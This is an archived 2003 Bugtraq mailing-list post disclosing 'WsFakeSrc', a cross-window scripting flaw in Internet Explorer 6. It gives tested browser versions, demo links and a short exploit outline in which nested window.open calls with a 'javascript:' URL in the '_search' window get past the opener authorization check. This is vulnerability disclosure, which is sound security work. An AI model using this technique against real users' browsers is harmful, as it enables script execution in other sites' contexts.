[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: MSIE->WsFakeSrc
From: Liu Die Yu <liudieyuinchina () yahoo ! com ! cn>
Date: 2003-09-10 5:52:36
[Download RAW message or body]
WsFakeSrc
[tested]
Browser Ver
{
MS Internet Explorer: 6.0.2600.0000.xpclnt_qfe.021108-2107;
Encryption: 128-bit;
Patch:; Q810847;
}
(So, it's far from fully patched.)
OS Ver: "Windows XP Cn ver"
[demo]
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
or
http://umbrella.mx.tc
---> WsFakeSrc section
---> WsFakeSrc-MyPage file
[exp]
window.open("javascript:[JpuScript]","_search")
authorization checks "window.opener".
but, [VictimWindow].open is always accessible.
so:
window.open("[VictimUrl]","_search");
[VictimIframe].open("javascript:[JpuScript]","_search");
can fool the authorization and execute [JpuScript] in
the search window.
[greetings]
the Pull, dror, guninski, sandblad and "Friedrich L.Bauer".
of course, mom and dad.
best wishes
-----
from http://Umbrella.MX.TC on http://SafeCenter.NET
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic